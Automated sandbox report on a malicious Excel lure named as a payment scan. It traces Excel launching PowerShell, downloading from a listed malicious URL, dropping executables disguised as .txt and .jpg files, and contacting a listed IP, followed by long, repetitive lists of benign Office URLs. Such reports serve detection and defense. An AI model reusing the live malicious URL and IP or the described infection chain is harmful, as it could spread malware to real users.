      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsMasquerading11DCSyncProcess Discovery3Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobVirtualization/Sandbox Evasion14Proc FilesystemApplication Window Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Process Injection112/etc/passwd and /etc/shadowRemote System Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 signatures2 2 Behavior Graph ID: 337288 Sample: Scanned_25526662-Payment.xls Startdate: 08/01/2021 Architecture: WINDOWS Score: 100 54 Multi AV Scanner detection for dropped file 2->54 56 Multi AV Scanner detection for submitted file 2->56 58 Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) 2->58 60 8 other signatures 2->60 9 EXCEL.EXE 29 37 2->9         started        13 Test3.jpg 2->13         started        process3 file4 44 C:\Users\...\Scanned_25526662-Payment.xls.LNK, MS 9->44 dropped 66 Document exploit detected (process start blacklist hit) 9->66 68 PowerShell case anomaly found 9->68 15 cmd.exe 1 9->15         started        70 Antivirus detection for dropped file 13->70 72 Machine Learning detection for dropped file 13->72 74 Maps a DLL or memory area into another process 13->74 76 Contains functionality to hide a thread from the debugger 13->76 18 Test3.jpg 1 13->18         started        signatures5 process6 dnsIp7 78 PowerShell case anomaly found 15->78 21 powershell.exe 15 36 15->21         started        26 conhost.exe 15->26         started        50 45.15.143.216, 49734, 49740, 49742 DEDIPATH-LLCUS Latvia 18->50 80 Hides threads from debuggers 18->80 signatures8 process9 dnsIp10 52 lankarecipes.com 192.185.236.165, 49731, 80 UNIFIEDLAYER-AS-1US United States 21->52 40 C:\Users\user\AppData\Local\Temp\Test1.txt, PE32 21->40 dropped 42 C:\Users\user\AppData\...\nwaha3c5.cmdline, UTF-8 21->42 dropped 64 Powershell drops PE file 21->64 28 cmd.exe 1 21->28         started        30 cmd.exe 2 21->30         started        33 csc.exe 3 21->33         started        file11 signatures12 process13 file14 35 WMIC.exe 1 28->35         started        46 C:\Users\user\AppData\Local\Temp\Test3.jpg, PE32 30->46 dropped 48 C:\Users\user\AppData\Local\...\nwaha3c5.dll, PE32 33->48 dropped 38 cvtres.exe 1 33->38         started        process15 signatures16 62 Creates processes via WMI 35->62

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      Scanned_25526662-Payment.xls15%VirustotalBrowse
      Scanned_25526662-Payment.xls15%ReversingLabsDocument-Word.Trojan.Heuristic

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Temp\Test3.jpg100%AviraTR/Dropper.Gen
      C:\Users\user\AppData\Local\Temp\Test3.jpg100%Joe Sandbox ML
      C:\Users\user\AppData\Local\Temp\Test1.txt100%Joe Sandbox ML
      C:\Users\user\AppData\Local\Temp\Test1.txt36%ReversingLabsWin32.Trojan.Caynamer

      Unpacked PE Files

      SourceDetectionScannerLabelLinkDownload
      27.2.Test3.jpg.30e0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
      29.1.Test3.jpg.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
      29.2.Test3.jpg.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File

      Domains

      SourceDetectionScannerLabelLink
      lankarecipes.com0%VirustotalBrowse

      URLs

      SourceDetectionScannerLabelLink
      https://cdn.entity.0%URL Reputationsafe
      https://cdn.entity.0%URL Reputationsafe
      https://cdn.entity.0%URL Reputationsafe
      https://cdn.entity.0%URL Reputationsafe
      https://wus2-000.contentsync.0%URL Reputationsafe
      https://wus2-000.contentsync.0%URL Reputationsafe
      https://wus2-000.contentsync.0%URL Reputationsafe
      https://wus2-000.contentsync.0%URL Reputationsafe
      http://lankarecipes.com/Sparc.jp0%Avira URL Cloudsafe
      https://powerlift.acompli.net0%URL Reputationsafe
      https://powerlift.acompli.net0%URL Reputationsafe
      https://powerlift.acompli.net0%URL Reputationsafe
      https://powerlift.acompli.net0%URL Reputationsafe
      https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
      https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
      https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
      https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
      https://cortana.ai0%URL Reputationsafe
      https://cortana.ai0%URL Reputationsafe
      https://cortana.ai0%URL Reputationsafe
      https://cortana.ai0%URL Reputationsafe
      https://api.aadrm.com/0%URL Reputationsafe
      https://api.aadrm.com/0%URL Reputationsafe
      https://api.aadrm.com/0%URL Reputationsafe
      https://api.aadrm.com/0%URL Reputationsafe
      https://ofcrecsvcapi-int.azurewebsites.net/0%VirustotalBrowse
      https://ofcrecsvcapi-int.azurewebsites.net/0%Avira URL Cloudsafe
      https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
      https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
      https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
      https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
      https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
      https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
      https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
      https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
      https://officeci.azurewebsites.net/api/0%VirustotalBrowse
      https://officeci.azurewebsites.net/api/0%Avira URL Cloudsafe
      https://store.office.cn/addinstemplate0%URL Reputationsafe
      https://store.office.cn/addinstemplate0%URL Reputationsafe
      https://store.office.cn/addinstemplate0%URL Reputationsafe
      https://store.office.cn/addinstemplate0%URL Reputationsafe
      https://wus2-000.pagecontentsync.0%URL Reputationsafe
      https://wus2-000.pagecontentsync.0%URL Reputationsafe
      https://wus2-000.pagecontentsync.0%URL Reputationsafe
      https://wus2-000.pagecontentsync.0%URL Reputationsafe
      https://store.officeppe.com/addinstemplate0%URL Reputationsafe
      https://store.officeppe.com/addinstemplate0%URL Reputationsafe
      https://store.officeppe.com/addinstemplate0%URL Reputationsafe
      https://store.officeppe.com/addinstemplate0%URL Reputationsafe
      https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
      https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
      https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
      https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
      https://www.odwebp.svc.ms0%URL Reputationsafe
      https://www.odwebp.svc.ms0%URL Reputationsafe
      https://www.odwebp.svc.ms0%URL Reputationsafe
      https://www.odwebp.svc.ms0%URL Reputationsafe
      https://dataservice.o365filtering.com/0%URL Reputationsafe
      https://dataservice.o365filtering.com/0%URL Reputationsafe
      https://dataservice.o365filtering.com/0%URL Reputationsafe
      https://dataservice.o365filtering.com/0%URL Reputationsafe
      https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
      https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
      https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
      https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
      https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
      https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
      https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
      https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
      https://apis.live.net/v5.0/0%URL Reputationsafe
      https://apis.live.net/v5.0/0%URL Reputationsafe
      https://apis.live.net/v5.0/0%URL Reputationsafe
      https://apis.live.net/v5.0/0%URL Reputationsafe
      https://asgsmsproxyapi.azurewebsites.net/0%Avira URL Cloudsafe
      http://lankarecipes.com/Sparc.jpg0%Avira URL Cloudsafe
      https://ncus-000.contentsync.0%URL Reputationsafe
      https://ncus-000.contentsync.0%URL Reputationsafe
      https://ncus-000.contentsync.0%URL Reputationsafe
      https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
      https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
      https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
      https://skyapi.live.net/Activity/0%URL Reputationsafe
      https://skyapi.live.net/Activity/0%URL Reputationsafe
      https://skyapi.live.net/Activity/0%URL Reputationsafe
      https://dataservice.o365filtering.com0%URL Reputationsafe
      https://dataservice.o365filtering.com0%URL Reputationsafe
      https://dataservice.o365filtering.com0%URL Reputationsafe
      https://api.cortana.ai0%Avira URL Cloudsafe
      https://ovisualuiapp.azurewebsites.net/pbiagave/0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      lankarecipes.com
      		192.185.236.165
      		truetrueunknown

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://lankarecipes.com/Sparc.jpgfalse
      • Avira URL Cloud: safe
      		unknown

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      https://api.diagnosticssdf.office.com6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
        		high
        https://login.microsoftonline.com/6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
          		high
          https://shell.suite.office.com:14436F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
            		high
            https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
              		high
              https://autodiscover-s.outlook.com/6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                		high
                https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                  		high
                  https://cdn.entity.6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  		unknown
                  https://api.addins.omex.office.net/appinfo/query6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                    		high
                    https://wus2-000.contentsync.6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    https://clients.config.office.net/user/v1.0/tenantassociationkey6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                      		high
                      https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                        		high
                        http://lankarecipes.com/Sparc.jpPowerShell_transcript.648351.+jaH7BR7.20210108094000.txt.3.drtrue
                        • Avira URL Cloud: safe
                        		unknown
                        https://powerlift.acompli.net6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        https://rpsticket.partnerservices.getmicrosoftkey.com6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        https://lookup.onenote.com/lookup/geolocation/v16F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                          		high
                          https://cortana.ai6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                            		high
                            https://cloudfiles.onenote.com/upload.aspx6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                              		high
                              https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                		high
                                https://entitlement.diagnosticssdf.office.com6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                  		high
                                  https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                    		high
                                    https://api.aadrm.com/6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    https://ofcrecsvcapi-int.azurewebsites.net/6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                    • 0%, Virustotal, Browse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                      		high
                                      https://api.microsoftstream.com/api/6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                        		high
                                        https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                          		high
                                          https://cr.office.com6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                            		high
                                            https://portal.office.com/account/?ref=ClientMeControl6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                              		high
                                              https://ecs.office.com/config/v2/Office6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                		high
                                                https://graph.ppe.windows.net6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                  		high
                                                  https://res.getmicrosoftkey.com/api/redemptionevents6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://powerlift-frontdesk.acompli.net6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://tasks.office.com6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                    		high
                                                    https://officeci.azurewebsites.net/api/6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                    • 0%, Virustotal, Browse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://sr.outlook.office.net/ws/speech/recognize/assistant/work6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                      		high
                                                      https://store.office.cn/addinstemplate6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://wus2-000.pagecontentsync.6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://outlook.office.com/autosuggest/api/v1/init?cvid=6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                        		high
                                                        https://globaldisco.crm.dynamics.com6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                          		high
                                                          https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                            		high
                                                            https://store.officeppe.com/addinstemplate6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		unknown
                                                            https://dev0-api.acompli.net/autodetect6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		unknown
                                                            https://www.odwebp.svc.ms6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		unknown
                                                            https://api.powerbi.com/v1.0/myorg/groups6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                              		high
                                                              https://web.microsoftstream.com/video/6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                		high
                                                                https://graph.windows.net6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                  		high
                                                                  https://dataservice.o365filtering.com/6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  https://officesetup.getmicrosoftkey.com6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  https://analysis.windows.net/powerbi/api6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                    		high
                                                                    https://prod-global-autodetect.acompli.net/autodetect6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    https://outlook.office365.com/autodiscover/autodiscover.json6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                      		high
                                                                      https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                        		high
                                                                        https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                          		high
                                                                          https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                            		high
                                                                            https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                              		high
                                                                              https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                		high
                                                                                http://weather.service.msn.com/data.aspx6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                  		high
                                                                                  https://apis.live.net/v5.0/6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                    		high
                                                                                    https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                      		high
                                                                                      https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                        		high
                                                                                        https://management.azure.com6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                          		high
                                                                                          https://incidents.diagnostics.office.com6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                            		high
                                                                                            https://clients.config.office.net/user/v1.0/ios6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                              		high
                                                                                              https://insertmedia.bing.office.net/odc/insertmedia6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                                		high
                                                                                                https://o365auditrealtimeingestion.manage.office.com6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                                  		high
                                                                                                  https://outlook.office365.com/api/v1.0/me/Activities6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                                    		high
                                                                                                    https://api.office.net6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                                      		high
                                                                                                      https://incidents.diagnosticssdf.office.com6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                                        		high
                                                                                                        https://asgsmsproxyapi.azurewebsites.net/6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        https://clients.config.office.net/user/v1.0/android/policies6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                                          		high
                                                                                                          https://entitlement.diagnostics.office.com6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                                            		high
                                                                                                            https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                                              		high
                                                                                                              https://outlook.office.com/6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                                                		high
                                                                                                                https://curl.haxx.se/docs/http-cookies.htmlTest3.jpg, Test3.jpg, 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://storage.live.com/clientlogs/uploadlocation6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                                                    		high
                                                                                                                    https://templatelogging.office.com/client/log6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                                                      		high
                                                                                                                      https://outlook.office365.com/6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                                                        		high
                                                                                                                        https://webshell.suite.office.com6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                                                          		high
                                                                                                                          https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                                                            		high
                                                                                                                            https://management.azure.com/6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                                                              		high
                                                                                                                              https://ncus-000.contentsync.6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              		unknown
                                                                                                                              https://login.windows.net/common/oauth2/authorize6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                                                                		high
                                                                                                                                https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                		unknown
                                                                                                                                https://graph.windows.net/6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                                                                  		high
                                                                                                                                  https://api.powerbi.com/beta/myorg/imports6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                                                                    		high
                                                                                                                                    https://devnull.onenote.com6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                                                                      		high
                                                                                                                                      https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                                                                        		high
                                                                                                                                        https://messaging.office.com/6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                                                                          		high
                                                                                                                                          https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                                                                            		high
                                                                                                                                            https://contentstorage.omex.office.net/addinclassifier/officeentities6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                                                                              		high
                                                                                                                                              https://augloop.office.com/v26F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                                                                                		high
                                                                                                                                                https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                                                                                  		high
                                                                                                                                                  https://skyapi.live.net/Activity/6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  		unknown
                                                                                                                                                  https://clients.config.office.net/user/v1.0/mac6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                                                                                    		high
                                                                                                                                                    https://dataservice.o365filtering.com6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    		unknown
                                                                                                                                                    https://api.cortana.ai6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    		unknown
                                                                                                                                                    https://onedrive.live.com6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                                                                                      		high
                                                                                                                                                      https://ovisualuiapp.azurewebsites.net/pbiagave/6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                      		unknown

                                                                                                                                                      Contacted IPs

                                                                                                                                                      • No. of IPs < 25%
                                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                                      • 75% < No. of IPs

                                                                                                                                                      Public

                                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                      45.15.143.216
                                                                                                                                                      		unknownLatvia
                                                                                                                                                      		35913DEDIPATH-LLCUSfalse
                                                                                                                                                      192.185.236.165
                                                                                                                                                      		unknownUnited States
                                                                                                                                                      		46606UNIFIEDLAYER-AS-1UStrue

                                                                                                                                                      General Information

                                                                                                                                                      Joe Sandbox Version:31.0.0 Red Diamond
                                                                                                                                                      Analysis ID:337288
                                                                                                                                                      Start date:08.01.2021
                                                                                                                                                      Start time:09:35:32
                                                                                                                                                      Joe Sandbox Product:CloudBasic
                                                                                                                                                      Overall analysis duration:0h 8m 47s
                                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                                      Report type:full
                                                                                                                                                      Sample file name:Scanned_25526662-Payment.xls
                                                                                                                                                      Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                      Run name:Potential for more IOCs and behavior
                                                                                                                                                      Number of analysed new started processes analysed:35
                                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                                      Number of injected processes analysed:0
                                                                                                                                                      Technologies:
                                                                                                                                                      • HCA enabled
                                                                                                                                                      • EGA enabled
                                                                                                                                                      • HDC enabled
                                                                                                                                                      • AMSI enabled
                                                                                                                                                      Analysis Mode:default
                                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                                      Detection:MAL
                                                                                                                                                      Classification:mal100.troj.expl.evad.winXLS@19/22@1/2
                                                                                                                                                      EGA Information:Failed
                                                                                                                                                      HDC Information:
                                                                                                                                                      • Successful, ratio: 76.2% (good quality ratio 44.6%)
                                                                                                                                                      • Quality average: 49.4%
                                                                                                                                                      • Quality standard deviation: 44.8%
                                                                                                                                                      HCA Information:Failed
                                                                                                                                                      Cookbook Comments:
                                                                                                                                                      • Adjust boot time
                                                                                                                                                      • Enable AMSI
                                                                                                                                                      • Found application associated with file extension: .xls
                                                                                                                                                      • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                      • Attach to Office via COM
                                                                                                                                                      • Scroll down
                                                                                                                                                      • Close Viewer
                                                                                                                                                      Warnings:
                                                                                                                                                      Show All
                                                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, conhost.exe, SgrmBroker.exe, svchost.exe
                                                                                                                                                      • Excluded IPs from analysis (whitelisted): 168.61.161.212, 104.42.151.234, 52.109.32.63, 52.109.8.22, 52.109.12.21, 104.43.139.144, 104.79.90.110, 13.107.5.88, 13.107.42.23, 51.104.139.180, 8.253.145.105, 8.248.117.254, 8.248.149.254, 8.253.207.121, 8.253.145.120, 92.122.213.194, 92.122.213.247, 20.54.26.129
